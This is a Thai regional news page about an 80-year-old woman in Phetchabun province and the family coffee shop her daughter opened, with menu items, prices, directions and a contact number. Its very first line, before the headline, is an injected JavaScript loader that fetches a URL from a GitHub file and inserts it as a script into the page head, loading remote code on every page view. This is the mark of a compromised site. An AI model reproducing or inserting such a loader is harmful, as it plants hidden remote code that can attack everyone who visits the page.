;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); เพชรบูรณ์ คุณยายวัย 80 ปีพากิน บ้านเขาสัก ตั้งหลัก สู้ชีวิต - ThaiReference | อาสาไทยยืนยัน
เพชรบูรณ์ คุณยายวัย 80 ปีพากิน บ้านเขาสัก ตั้งหลัก สู้ชีวิต

ผู้สื่อข่าวรายงาน พบคุณยายร่างกายแข็งแรงยังร้องรำทำเพลงได้ ถึงจะอายุ 80 ปี แล้วก็ตาม เลี้ยงลูก 9 คนคุณยาย แฉล้ม  สุมานะ อายุ 80 ปีเล่าย้อนหลัง ว่าเมื่ออายุ ได้ 21 ปี ได้แต่งงานและสามีพากันมาตั้งหลักปกฐานที่บ้านเขาสัก  หมู่ 4 ต.ตะกุดไร อ.ชนแดน จ.เพชรบูรณ์โดยยึดอาชีพทำนาสามีได้เสียชีวิตไปเมื่อ 20 ปี แล้วตนเลี้ยงดูลูกมาตลอด ชอบเข้าวัดทำบุญและร่วมสร้างกุศล ได้สร้างวัดและอุปถัมภ์วัด เขาสัก และวัดป่าเขาสัก ต.ตะกุดไร อ.ชนแดน จ.เพชรบูรณ์ ตนส่งลูกเรียนหนังสือจนจบไปทำงานที่กรุงเทพฯ ด้วยเศรษฐกิจไม่ค่อยดี จึงลาออกจากงานเมื่อ 3 ปีก่อนลูกสาวชื่อ น.ส.ศรีนวล สุมานะ อายุ 50 ปี และชวนเพื่อ ชื่อ น.ส.สุวิมล  มักธิยะ อายุ 50  ปีมาตั้งหลักที่บ้านเขาสัก เลขที่ 191 หมู่ 4 ตำบลตะกุดไร อำเภอชนแดน จังหวัดเพชรบูรณ์  โดยมี แม่ ชื่อ นางแฉล้ม  สุมานะ  อายุ 80 ปี 

คอยให้คำแนะนำ ให้คำปรึกษาสนับสนุนทุนเปิด ร้านขายกาแฟ ขายอาหารและอาหารรับประทานเล่น เช่นยาปลาทูน่า สลัดผัก(น้ำสลัดทำเอง)  ผัดกะเพาไข่เจียว กระเพาะปลาไม่ใส่หน่อไม้  เค้กบราวนี่ เค้กส้ม ตั้งชื่อร้านเขาสักคอฟฟี่ coffee หมู่ 4 บ้านเขาสัก ตำบลตะกุดไร  อำเภอชนแดน   จังหวัดเพชรบูรณ์ เดินทางจากถนนสายเอเซียจากกรุงเทพ-เชียงใหม่ ถึงสี่แยกเขาทราย เลี้ยว เข้าถนนสายตะพานหิน- เพชรบูรณ์-ถึงบ้านดงขุยถ้ามาจาก จังหวัดเพชรบูรณ์พอถึง หลักกิโลเมตรที่ 43 เลี้ยวขวา เข้าถนนสายบ้านดงขุย – วังชนาง พอถึงหลักกิโลเมตรที่ 36 จะถึง  ร้านเขาสัก coffee  บ้านเขาสัก อยู่ทิศตะวันตก

เจ้าของร้านชื่อ นางสาวศรีนวล สุมานะและ นางสาวสุวิมล มักธิยะ  เปิดเผยกับผู้สื่อข่าวว่าเปิดร้านมากว่า 3 ปี อาหารยอดนิยมในท้องถิ่นสลัดผัก   กาแฟส้ม  ชาไทยมะพร้าวนมสด ที่ใช้มะพร้าวของอำเภอชนแดน   อิตาเลี่ยนโซดา บลูฮาวายโซดาเป็นที่ชื่นชอบของลูกค้าในชนบท  และมีเมนูน้ำขวดเช่น น้ำกระเจี๊ยบ น้ำอัญชัน  น้ำเก๊กฮวย  โอเลี้ยง  และมีน้ำสำรองน้ำผลไม้ที่มาจากเมืองจันทร์ทานแล้วเพื่อสุขภาพ   เมนูทานเล่นเช่น  สลัดผัก  ยำปลาทูน่า  ผัดกระเพราไข่เจียวจานละ 40 บาท  กระเพราะปลา 50 บาท  กระเพาะปลาที่ร้านจะไม่ใส่หน่อไม้เพื่อไม่ให้มีกลิ่น  และยังมีน้ำพริกเผากุ้งสูตรโบราณที่ใช้ของแห้งทั้งหมดทำให้สามารถเก็บรักษาไว้ได้นานและไม่ใส่สารกันบูด  เจ้าของร้านนางสาวศรีนวล  สุมานะ  เล่าว่าไปทำงานที่กรุงเทพฯมา 20 ปีช่วงติดโควิดก็ได้กลับมาบ้านแล้วเปิดร้านที่บ้าน  เป็นร้านแบบครอบครัว   ที่ร้านก็จะสามารถมาสั่งกินแบบครอบครัวหรือสั่งไว้ล่วงหน้าเพื่อที่จะเตรียมของ  หรือมาคนเดียวก็ได้  ร้านจะมีรายได้ช่วงนี้จะตกประมาณ 1,000 บาท ต่อวัน ส่วนน้ำและกาแฟจะขายได้ไม่ต่ำกว่า 50 แก้วต่อวัน   ปีนี้ 2568  ช่วงสงกรานต์ถ้าเศรษฐกิจดีก็จะขายได้   สามารถเช็คอินได้ที่ บ้านกาแฟร้านเฮียนิด  น่ะค่ะ 

ถ้าหากใครอยากจะได้น้ำแบบขวดก็สามารถสั่งซื้อได้โหลละ 100 บาทและถ้าเป็นน้ำกระเจี๊ยบ  น้ำอัญชัน  น้ำเก๊กฮวยและโอเลี้ยง  ถ้าราคาโหลละ 120 บาท ส่วนกาแฟ   และน้ำสำรองโหลละ 150 บาทต้องสั่งล่วงหน้าสามารถติดต่อสอบถามได้ที่ นางสาวศรีนวล สุมานะ ร้าน เบอร์ 092-012  3496               

อุดมศักดิ์ เหล็กคำ/สายน้ำ เณรทอง/กัญชิศา สุขเผือก/ ภาพข่าว/ภูมิภาค

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]